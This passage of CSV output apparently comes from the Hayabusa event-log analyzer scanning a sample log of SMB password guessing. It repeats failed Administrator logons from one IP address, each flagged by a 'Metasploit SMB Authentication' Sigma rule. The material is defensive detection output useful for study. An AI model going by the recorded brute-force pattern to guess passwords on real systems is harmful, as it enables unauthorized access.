Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lH6TVXSqJb1qLd3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edDWye6c2UhKznR6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxKUl1lynGY1ectn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vI5yUgukPBVRorJI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmR29QcBKMGVQ8rB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7luV5GfiT0v0h7D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yA7pIDFgQbLIInqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 84g2gO0253Ut4O1O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DRkFX9WTAhBZ8jc8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuoQAi4k3XZPaf4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KjKMhCnbR0uFT0av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lfwqPB0AgTfIOt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mJuG26pQzdjUQael : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXwEziYTA3DkkFVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CHr6dirvkT8B9ZVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B5eSMLiF4BsfY3xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64ISDuFRhR6cFYVQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcprXytyuBw380XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxfQWiSIhZYxwNjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FcL982boDelzeyzK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBAAjRdaR8U0tqt7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EmqUjcltAW6StHQJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 129Rp3HCmRVRXw3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jpIIQP2oWEF51EBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HREGh5ppEkLAuEob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UVkpQvotEMfM8R0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm6uHEy5RJJBJ6FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPTyAkYjcIlko5lu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OjlRoo9Sot4Fx4Th : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XslY26kw2aBw19D8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1404fakprYeqGiNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2VfIjtBcXCRlOjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPztyX4J9NV8EldT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 07flrrzWgsVBYaN2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vgkqkC1VvznGxR6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hMn6yDMLgLChJTL6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uSTokOJ31Tj0bLXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyRifC46GrNpTA4x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvNaby30vAT9drAX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wkYSOQ2bD51a4U8l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rqdOquL9Ax01RPPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nqCCiK5arcyRHha6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpyTGZLkAb0w0kgW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wa2pXrZKxeZZYKAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dK0N5KeBgCze1YWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g4dHlwZjMzI5wU2s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GzF2ouP5KkRfsxnf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 